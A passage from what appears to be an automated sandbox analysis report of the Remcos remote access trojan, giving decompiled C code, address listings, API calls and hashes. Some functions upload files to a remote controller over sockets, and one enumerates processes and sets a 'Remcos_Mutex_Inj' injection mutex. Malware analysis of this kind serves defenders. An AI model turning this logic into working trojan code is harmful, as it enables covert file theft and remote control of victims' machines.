                                                                                                								goto L17;
                                                                                                							} else {
                                                                                                								goto L5;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					E004020DE(0, _t296 - 0x18, _t275, _t305,  &_a8);
                                                                                                					_push(0x53);
                                                                                                					E00404BB7(0, 0x46e318, _t275, _t305);
                                                                                                					L24:
                                                                                                					E00404F18(_t292, _t275);
                                                                                                					_t143 = 0;
                                                                                                					L25:
                                                                                                					_t196 = _t143;
                                                                                                				}
                                                                                                				L18:
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return _t196;
                                                                                                			}

                                                                                                0x004068e1
                                                                                                0x004068e5
                                                                                                0x004068e9
                                                                                                0x004068ee
                                                                                                0x004068f7
                                                                                                0x00406902
                                                                                                0x0040690d
                                                                                                0x00406918
                                                                                                0x00406923
                                                                                                0x0040692e
                                                                                                0x00406939
                                                                                                0x00406944
                                                                                                0x0040694f
                                                                                                0x0040695a
                                                                                                0x00406965
                                                                                                0x00406970
                                                                                                0x0040697b
                                                                                                0x00406986
                                                                                                0x00406991
                                                                                                0x00406999
                                                                                                0x0040699e
                                                                                                0x004069a0
                                                                                                0x00406a1b
                                                                                                0x00406a21
                                                                                                0x00406a2a
                                                                                                0x00406a30
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069a0
                                                                                                0x004067cc
                                                                                                0x004067c2
                                                                                                0x00000000
                                                                                                0x004069a2
                                                                                                0x004069a5
                                                                                                0x004069aa
                                                                                                0x004069ad
                                                                                                0x004069b0
                                                                                                0x004069b3
                                                                                                0x004069b6
                                                                                                0x004069c1
                                                                                                0x004069c3
                                                                                                0x004069c4
                                                                                                0x004069c7
                                                                                                0x004069c9
                                                                                                0x004069cc
                                                                                                0x004069cf
                                                                                                0x004069d2
                                                                                                0x004069d2
                                                                                                0x004069db
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004069dd
                                                                                                0x004069dd
                                                                                                0x004069dd
                                                                                                0x00000000
                                                                                                0x00406754
                                                                                                0x00406754
                                                                                                0x00406757
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00406757
                                                                                                0x00406752
                                                                                                0x00406689
                                                                                                0x00406692
                                                                                                0x00406697
                                                                                                0x0040669e
                                                                                                0x00406a91
                                                                                                0x00406a93
                                                                                                0x00406a98
                                                                                                0x00406a9a
                                                                                                0x00406a9a
                                                                                                0x00406a9a
                                                                                                0x004069f6
                                                                                                0x004069f9
                                                                                                0x00406a01
                                                                                                0x00406a09
                                                                                                0x00406a16

                                                                                                APIs
                                                                                                  • Part of subcall function 004049DE: connect.WS2_32(FFFFFFFF,?,?), ref: 004049F6
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040667C
                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004066B3
                                                                                                • __aulldiv.LIBCMT ref: 0040672F
                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 0040679F
                                                                                                • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 004067BA
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                  • Part of subcall function 00404F18: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E268,00000000,00404D9D,00000000,00000000,00000000,00000000,0046E268,0000000C), ref: 00404F22
                                                                                                  • Part of subcall function 00404F18: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F31
                                                                                                  • Part of subcall function 00404F18: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040558F), ref: 00404F3A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateEventHandleObjectPointerReadSingleSizeWait__aulldivconnectsend
                                                                                                • String ID: PF$ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                                                                                • API String ID: 4212504463-204989135
                                                                                                • Opcode ID: b503e318100d39b7385c6b39062d2101c3b1ccf20bc28210d2f18f2475aba8e4
                                                                                                • Instruction ID: 03515be065d0fd85a620034be54720d5bfb627ccde470538336df9fe0d4744a6
                                                                                                • Opcode Fuzzy Hash: b503e318100d39b7385c6b39062d2101c3b1ccf20bc28210d2f18f2475aba8e4
                                                                                                • Instruction Fuzzy Hash: D3C17971A00119ABCB04EBA5DD929EEB7B9AF44308F10417FF506722D1EF789E85CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 64%
                                                                                                			E004198B9(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                				struct tagPOINT _v12;
                                                                                                				void* _t16;
                                                                                                				struct HMENU__* _t17;
                                                                                                				void* _t20;
                                                                                                				void* _t24;
                                                                                                
                                                                                                				_t16 = _a8 - 1;
                                                                                                				if(_t16 == 0) {
                                                                                                					_t17 = CreatePopupMenu();
                                                                                                					 *0x46deac = _t17;
                                                                                                					AppendMenuA(_t17, 0, 0, "Close");
                                                                                                					L15:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t20 = _t16 - 0x110;
                                                                                                				if(_t20 == 0) {
                                                                                                					if(_a12 != 0) {
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					Shell_NotifyIconA(2, 0x46deb0);
                                                                                                					ExitProcess(0);
                                                                                                				}
                                                                                                				if(_t20 == 0x2f0) {
                                                                                                					_t24 = _a16 - 0x201;
                                                                                                					if(_t24 == 0) {
                                                                                                						if(IsWindowVisible( *0x46e0ac) == 0) {
                                                                                                							ShowWindow( *0x46e0ac, 9);
                                                                                                							SetForegroundWindow( *0x46e0ac);
                                                                                                						} else {
                                                                                                							ShowWindow( *0x46e0ac, 0);
                                                                                                						}
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					if(_t24 == 3) {
                                                                                                						GetCursorPos( &_v12);
                                                                                                						SetForegroundWindow(_a4);
                                                                                                						TrackPopupMenu( *0x46deac, 0, _v12, _v12.y, 0, _a4, 0);
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					_push(_a16);
                                                                                                					_push(_a12);
                                                                                                					_push(0x401);
                                                                                                					L7:
                                                                                                					return DefWindowProcA(_a4, ??, ??, ??);
                                                                                                				}
                                                                                                				_push(_a16);
                                                                                                				_push(_a12);
                                                                                                				_push(_a8);
                                                                                                				goto L7;
                                                                                                			}









                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 00419904
                                                                                                • GetCursorPos.USER32(?), ref: 00419913
                                                                                                • SetForegroundWindow.USER32(?), ref: 0041991C
                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00419936
                                                                                                • Shell_NotifyIconA.SHELL32(00000002,0046DEB0), ref: 00419987
                                                                                                • ExitProcess.KERNEL32 ref: 0041998F
                                                                                                • CreatePopupMenu.USER32 ref: 00419995
                                                                                                • AppendMenuA.USER32 ref: 004199AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                • String ID: Close
                                                                                                • API String ID: 1657328048-3535843008
                                                                                                • Opcode ID: 241817903c567134a00bb5065f5f6e20a35be39454b02068a114404e5fd59868
                                                                                                • Instruction ID: 7947dd2c1efd330abad668ff4a12812bac83b808f9a2396390bbf0c7fa51e3ba
                                                                                                • Opcode Fuzzy Hash: 241817903c567134a00bb5065f5f6e20a35be39454b02068a114404e5fd59868
                                                                                                • Instruction Fuzzy Hash: 80216B71610209FFDB095FA4ED1DEAA3B75EB04302F004139F91298271D7BA9DA0EB1D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E0044088B(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                                                                				signed int _v8;
                                                                                                				char _v21;
                                                                                                				intOrPtr _v22;
                                                                                                				struct _cpinfo _v28;
                                                                                                				void* _v32;
                                                                                                				void* _v36;
                                                                                                				void* _v40;
                                                                                                				intOrPtr* _v44;
                                                                                                				signed int _v48;
                                                                                                				void* _v52;
                                                                                                				signed int* _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				intOrPtr* _v64;
                                                                                                				signed int* _v68;
                                                                                                				void* _v72;
                                                                                                				char _v76;
                                                                                                				signed int _t101;
                                                                                                				signed int _t123;
                                                                                                				signed short _t126;
                                                                                                				void* _t130;
                                                                                                				void* _t134;
                                                                                                				void* _t137;
                                                                                                				void* _t138;
                                                                                                				intOrPtr _t139;
                                                                                                				void* _t141;
                                                                                                				signed int _t142;
                                                                                                				intOrPtr* _t143;
                                                                                                				signed char _t160;
                                                                                                				signed char _t165;
                                                                                                				signed int _t166;
                                                                                                				void* _t168;
                                                                                                				signed int _t170;
                                                                                                				void* _t179;
                                                                                                				signed int* _t180;
                                                                                                				signed int* _t181;
                                                                                                				signed int _t182;
                                                                                                				signed char* _t189;
                                                                                                				signed char* _t190;
                                                                                                				signed int _t192;
                                                                                                				void* _t193;
                                                                                                				intOrPtr _t197;
                                                                                                				short* _t209;
                                                                                                				intOrPtr* _t211;
                                                                                                				intOrPtr* _t215;
                                                                                                				signed int _t216;
                                                                                                				signed int _t217;
                                                                                                				void* _t218;
                                                                                                				void* _t219;
                                                                                                
                                                                                                				_t101 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t101 ^ _t217;
                                                                                                				_t211 = _a4;
                                                                                                				_t170 = 0;
                                                                                                				_v64 = _t211;
                                                                                                				_v32 = 0;
                                                                                                				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                                                                                                				_v36 = 0;
                                                                                                				_v40 = 0;
                                                                                                				_v52 = 0;
                                                                                                				_v76 = _t211;
                                                                                                				_v72 = 0;
                                                                                                				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                                                                                                					__eflags =  *(_t211 + 0x8c);
                                                                                                					if( *(_t211 + 0x8c) != 0) {
                                                                                                						asm("lock dec dword [eax]");
                                                                                                					}
                                                                                                					 *(_t211 + 0x8c) = _t170;
                                                                                                					__eflags = 0;
                                                                                                					 *(_t211 + 0x90) = _t170;
                                                                                                					 *_t211 = 0x458830;
                                                                                                					 *((intOrPtr*)(_t211 + 0x94)) = 0x458ab0;
                                                                                                					 *((intOrPtr*)(_t211 + 0x98)) = 0x458c30;
                                                                                                					 *((intOrPtr*)(_t211 + 4)) = 1;
                                                                                                					L41:
                                                                                                					return E00430A5B(_v8 ^ _t217);
                                                                                                				}
                                                                                                				_t106 = _t211 + 8;
                                                                                                				_v44 = 0;
                                                                                                				if( *(_t211 + 8) != 0) {
                                                                                                					L3:
                                                                                                					_v44 = E00440628(_t172, 1, 4);
                                                                                                					E004414D5(_t170);
                                                                                                					_v32 = E00440628(_t172, 0x180, 2);
                                                                                                					E004414D5(_t170);
                                                                                                					_v36 = E00440628(_t172, 0x180, 1);
                                                                                                					E004414D5(_t170);
                                                                                                					_v40 = E00440628(_t172, 0x180, 1);
                                                                                                					E004414D5(_t170);
                                                                                                					_t197 = E00440628(_t172, 0x101, 1);
                                                                                                					_v52 = _t197;
                                                                                                					E004414D5(_t170);
                                                                                                					_t219 = _t218 + 0x3c;
                                                                                                					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                                                                                                						L36:
                                                                                                						E004414D5(_v44);
                                                                                                						E004414D5(_v32);
                                                                                                						E004414D5(_v36);
                                                                                                						E004414D5(_v40);
                                                                                                						_t170 = 1;
                                                                                                						__eflags = 1;
                                                                                                						goto L37;
                                                                                                					} else {
                                                                                                						_t123 = _t170;
                                                                                                						do {
                                                                                                							 *(_t123 + _t197) = _t123;
                                                                                                							_t123 = _t123 + 1;
                                                                                                						} while (_t123 < 0x100);
                                                                                                						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						_t126 = _v28;
                                                                                                						_t235 = _t126 - 5;
                                                                                                						if(_t126 > 5) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						_t28 = _t197 + 1; // 0x1
                                                                                                						_v48 = _t126 & 0x0000ffff;
                                                                                                						_t192 = 0xff;
                                                                                                						_t130 = E00444A05(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                                                                                                						_t219 = _t219 + 0x24;
                                                                                                						_t236 = _t130;
                                                                                                						if(_t130 == 0) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						_t34 = _t197 + 1; // 0x1
                                                                                                						_t134 = E00444A05(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                                                                                                						_t219 = _t219 + 0x24;
                                                                                                						if(_t134 == 0) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						if(_v48 <= 1 || _v22 == _t170) {
                                                                                                							L22:
                                                                                                							_v60 = _v32 + 0x100;
                                                                                                							_t137 = E0044A5FC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                                                                                                							_t219 = _t219 + 0x1c;
                                                                                                							if(_t137 == 0) {
                                                                                                								goto L36;
                                                                                                							}
                                                                                                							_t193 = _v32;
                                                                                                							_t138 = _t193 + 0xfe;
                                                                                                							 *_t138 = 0;
                                                                                                							_t179 = _v36;
                                                                                                							_v32 = _t138;
                                                                                                							_t139 = _v40;
                                                                                                							 *(_t179 + 0x7f) = _t170;
                                                                                                							_t180 = _t179 - 0xffffff80;
                                                                                                							 *(_t139 + 0x7f) = _t170;
                                                                                                							_v68 = _t180;
                                                                                                							 *_t180 = _t170;
                                                                                                							_t181 = _t139 + 0x80;
                                                                                                							_v56 = _t181;
                                                                                                							 *_t181 = _t170;
                                                                                                							if(_v48 <= 1 || _v22 == _t170) {
                                                                                                								L32:
                                                                                                								_t182 = 0x3f;
                                                                                                								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                                                                                                								_push(0x1f);
                                                                                                								asm("movsw");
                                                                                                								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                                                                                                								_push(0x1f);
                                                                                                								asm("movsw");
                                                                                                								asm("movsb");
                                                                                                								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
                                                                                                								asm("movsw");
                                                                                                								asm("movsb");
                                                                                                								_t215 = _v64;
                                                                                                								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
                                                                                                									asm("lock xadd [ecx], eax");
                                                                                                									if((_t142 | 0xffffffff) == 0) {
                                                                                                										E004414D5( *(_t215 + 0x90) - 0xfe);
                                                                                                										E004414D5( *(_t215 + 0x94) - 0x80);
                                                                                                										E004414D5( *(_t215 + 0x98) - 0x80);
                                                                                                										E004414D5( *((intOrPtr*)(_t215 + 0x8c)));
                                                                                                									}
                                                                                                								}
                                                                                                								_t143 = _v44;
                                                                                                								 *_t143 = 1;
                                                                                                								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
                                                                                                								 *_t215 = _v60;
                                                                                                								 *(_t215 + 0x90) = _v32;
                                                                                                								 *(_t215 + 0x94) = _v68;
                                                                                                								 *(_t215 + 0x98) = _v56;
                                                                                                								 *(_t215 + 4) = _v48;
                                                                                                								L37:
                                                                                                								E004414D5(_v52);
                                                                                                								goto L41;
                                                                                                							} else {
                                                                                                								_t189 =  &_v21;
                                                                                                								while(1) {
                                                                                                									_t160 =  *_t189;
                                                                                                									if(_t160 == 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t216 =  *(_t189 - 1) & 0x000000ff;
                                                                                                									if(_t216 > (_t160 & 0x000000ff)) {
                                                                                                										L30:
                                                                                                										_t189 =  &(_t189[2]);
                                                                                                										if( *(_t189 - 1) != _t170) {
                                                                                                											continue;
                                                                                                										}
                                                                                                										break;
                                                                                                									}
                                                                                                									_t209 = _t193 + 0x100 + _t216 * 2;
                                                                                                									do {
                                                                                                										_t216 = _t216 + 1;
                                                                                                										 *_t209 = 0x8000;
                                                                                                										_t209 = _t209 + 2;
                                                                                                									} while (_t216 <= ( *_t189 & 0x000000ff));
                                                                                                									goto L30;
                                                                                                								}
                                                                                                								goto L32;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t190 =  &_v21;
                                                                                                							while(1) {
                                                                                                								_t165 =  *_t190;
                                                                                                								if(_t165 == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t192 =  *(_t190 - 1) & 0x000000ff;
                                                                                                								_t166 = _t165 & 0x000000ff;
                                                                                                								while(_t192 <= _t166) {
                                                                                                									 *((char*)(_t192 + _t197)) = 0x20;
                                                                                                									_t192 = _t192 + 1;
                                                                                                									__eflags = _t192;
                                                                                                									_t166 =  *_t190 & 0x000000ff;
                                                                                                								}
                                                                                                								_t190 =  &(_t190[2]);
                                                                                                								_t242 =  *(_t190 - 1) - _t170;
                                                                                                								if( *(_t190 - 1) != _t170) {
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L22;
                                                                                                							}
                                                                                                							goto L22;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				_t168 = E0044C344(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
                                                                                                				_t219 = _t218 + 0x14;
                                                                                                				if(_t168 != 0) {
                                                                                                					goto L36;
                                                                                                				}
                                                                                                				goto L3;
                                                                                                			}



















































                                                                                                0x00440bce
                                                                                                0x00440bce
                                                                                                0x00000000
                                                                                                0x0044097e
                                                                                                0x0044097e
                                                                                                0x00440980
                                                                                                0x00440980
                                                                                                0x00440983
                                                                                                0x00440984
                                                                                                0x0044099a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004409a0
                                                                                                0x004409a3
                                                                                                0x004409a6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004409b3
                                                                                                0x004409b6
                                                                                                0x004409b9
                                                                                                0x004409d6
                                                                                                0x004409db
                                                                                                0x004409de
                                                                                                0x004409e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004409fa
                                                                                                0x00440a0a
                                                                                                0x00440a0f
                                                                                                0x00440a14
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a1e
                                                                                                0x00440a4b
                                                                                                0x00440a61
                                                                                                0x00440a64
                                                                                                0x00440a69
                                                                                                0x00440a6e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a74
                                                                                                0x00440a79
                                                                                                0x00440a7f
                                                                                                0x00440a82
                                                                                                0x00440a85
                                                                                                0x00440a88
                                                                                                0x00440a8b
                                                                                                0x00440a8e
                                                                                                0x00440a95
                                                                                                0x00440a98
                                                                                                0x00440a9b
                                                                                                0x00440a9d
                                                                                                0x00440aa3
                                                                                                0x00440aa6
                                                                                                0x00440aa8
                                                                                                0x00440aea
                                                                                                0x00440aec
                                                                                                0x00440af5
                                                                                                0x00440afa
                                                                                                0x00440afd
                                                                                                0x00440b07
                                                                                                0x00440b09
                                                                                                0x00440b0c
                                                                                                0x00440b0e
                                                                                                0x00440b17
                                                                                                0x00440b19
                                                                                                0x00440b1b
                                                                                                0x00440b1c
                                                                                                0x00440b27
                                                                                                0x00440b2c
                                                                                                0x00440b30
                                                                                                0x00440b3e
                                                                                                0x00440b51
                                                                                                0x00440b5f
                                                                                                0x00440b6a
                                                                                                0x00440b6f
                                                                                                0x00440b30
                                                                                                0x00440b72
                                                                                                0x00440b75
                                                                                                0x00440b7b
                                                                                                0x00440b84
                                                                                                0x00440b89
                                                                                                0x00440b92
                                                                                                0x00440b9b
                                                                                                0x00440ba4
                                                                                                0x00440bcf
                                                                                                0x00440bd2
                                                                                                0x00000000
                                                                                                0x00440aaf
                                                                                                0x00440aaf
                                                                                                0x00440ab2
                                                                                                0x00440ab2
                                                                                                0x00440ab6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440ab8
                                                                                                0x00440ac1
                                                                                                0x00440adf
                                                                                                0x00440adf
                                                                                                0x00440ae5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440ae5
                                                                                                0x00440ac9
                                                                                                0x00440acc
                                                                                                0x00440ad1
                                                                                                0x00440ad2
                                                                                                0x00440ad5
                                                                                                0x00440adb
                                                                                                0x00000000
                                                                                                0x00440acc
                                                                                                0x00000000
                                                                                                0x00440ae7
                                                                                                0x00440a25
                                                                                                0x00440a25
                                                                                                0x00440a28
                                                                                                0x00440a28
                                                                                                0x00440a2c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a2e
                                                                                                0x00440a32
                                                                                                0x00440a3f
                                                                                                0x00440a37
                                                                                                0x00440a3b
                                                                                                0x00440a3b
                                                                                                0x00440a3c
                                                                                                0x00440a3c
                                                                                                0x00440a43
                                                                                                0x00440a46
                                                                                                0x00440a49
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a49
                                                                                                0x00000000
                                                                                                0x00440a28
                                                                                                0x00440a1e
                                                                                                0x00440955
                                                                                                0x004408de
                                                                                                0x004408e3
                                                                                                0x004408e8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 109d58eb255c04e5817e0c087173d14677fbceec56e6c27230619c0e004eef4c
                                                                                                • Instruction ID: b9f94e09276150385d08ac38733416d409a918e356910f264f6a8d6928ae5958
                                                                                                • Opcode Fuzzy Hash: 109d58eb255c04e5817e0c087173d14677fbceec56e6c27230619c0e004eef4c
                                                                                                • Instruction Fuzzy Hash: FFB1B171900345AFEB10DFA5C841BEEB7F4FF08304F14406EF995A7352DA79A8519B68
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 97%
                                                                                                			E0040CE8E(void* __eflags, char _a4) {
                                                                                                				void* _v8;
                                                                                                				char _v32;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				char _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				char _v96;
                                                                                                				char _v120;
                                                                                                				char _v648;
                                                                                                				intOrPtr _v676;
                                                                                                				void* _v684;
                                                                                                				short _v1204;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t76;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t106;
                                                                                                				char* _t111;
                                                                                                				void* _t158;
                                                                                                				void* _t161;
                                                                                                
                                                                                                				_t106 = 0;
                                                                                                				GetModuleFileNameW(0,  &_v1204, 0x104);
                                                                                                				_t149 = "1";
                                                                                                				if(E00407795("1") != 0) {
                                                                                                					L14:
                                                                                                					E00401EEC( &_a4, _t149, _t159, E0041780B(_t106,  &_v120, _t149));
                                                                                                					_t111 =  &_v120;
                                                                                                					E00401EE2();
                                                                                                					if(E00418004(_t111) != 0) {
                                                                                                						_push(_t111);
                                                                                                						if(E0040D4F9( &_a4, L"Program Files\\") != 0xffffffff) {
                                                                                                							E0040D51A(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
                                                                                                						}
                                                                                                					}
                                                                                                					if(E0040EB2F( &_v1204,  &_a4) != 0) {
                                                                                                						L22:
                                                                                                						E00401EE2();
                                                                                                						return _t106;
                                                                                                					} else {
                                                                                                						L18:
                                                                                                						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
                                                                                                						E004020C7(_t106,  &_v96);
                                                                                                						E004183CC(E00401EDD(0x46e590),  &_v96);
                                                                                                						E00401F87( &_v96);
                                                                                                						if(E00414D29(E00401EDD( &_a4)) == 0) {
                                                                                                							CloseHandle(_t158);
                                                                                                						} else {
                                                                                                							_t106 = 1;
                                                                                                							E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "Inj", 1);
                                                                                                						}
                                                                                                						E00401FB9();
                                                                                                						goto L22;
                                                                                                					}
                                                                                                				}
                                                                                                				E00401F5F(0,  &_v32);
                                                                                                				_t76 = CreateToolhelp32Snapshot(2, 0);
                                                                                                				_v8 = _t76;
                                                                                                				_v684 = 0x22c;
                                                                                                				Process32FirstW(_t76,  &_v684);
                                                                                                				while(Process32NextW(_v8,  &_v684) != 0) {
                                                                                                					E00404260(_t106,  &_v56,  &_v648);
                                                                                                					_t157 = E004022FC( &_v56,  &_v60);
                                                                                                					_t159 = E004022BF( &_v56,  &_v64);
                                                                                                					E00408269( &_v72,  *((intOrPtr*)(E004022FC( &_v56,  &_v68))),  *_t84,  *_t82);
                                                                                                					_t161 = _t161 + 0xc;
                                                                                                					if(E00409EE1( &_a4) != 0) {
                                                                                                						E00401EEC( &_v32, _v676, _t159, E00418068( &_v120, _v676));
                                                                                                						E00401EE2();
                                                                                                						if(E00407795( &_v1204) == 0) {
                                                                                                							_t149 = 0x46079c;
                                                                                                							if(E00407795(0x46079c) != 0 || E00418032(_v676) != 0) {
                                                                                                								E00401EE2();
                                                                                                								L13:
                                                                                                								E00401EE2();
                                                                                                								goto L14;
                                                                                                							} else {
                                                                                                								E00409E8B( &_v32);
                                                                                                								E00401EE2();
                                                                                                								break;
                                                                                                							}
                                                                                                						}
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						goto L22;
                                                                                                					}
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				CloseHandle(_v8);
                                                                                                				_t149 = 0x46079c;
                                                                                                				if(E00407795(0x46079c) != 0) {
                                                                                                					goto L13;
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				goto L18;
                                                                                                			}


                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,hpg,00000000,00000001), ref: 0040CEA9
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0040CECF
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040CEEA
                                                                                                • Process32NextW.KERNEL32(0040C897,0000022C), ref: 0040CF5B
                                                                                                • CloseHandle.KERNEL32(0040C897,?,00000000,?,?,?), ref: 0040CF68
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D07E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040D0E0
                                                                                                  • Part of subcall function 00418068: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041807D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                                                • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj$hpg
                                                                                                • API String ID: 193334293-407998168
                                                                                                • Opcode ID: f6eb4f883c040c9c4d4ce09dff5f784f1b06908c0e32a02ed7585b0163100156
                                                                                                • Instruction ID: 0f7dcfa6b6154c6ef28bc8d9e985d7e6bba570805e57f3f35b7f7f9768b09353
                                                                                                • Opcode Fuzzy Hash: f6eb4f883c040c9c4d4ce09dff5f784f1b06908c0e32a02ed7585b0163100156
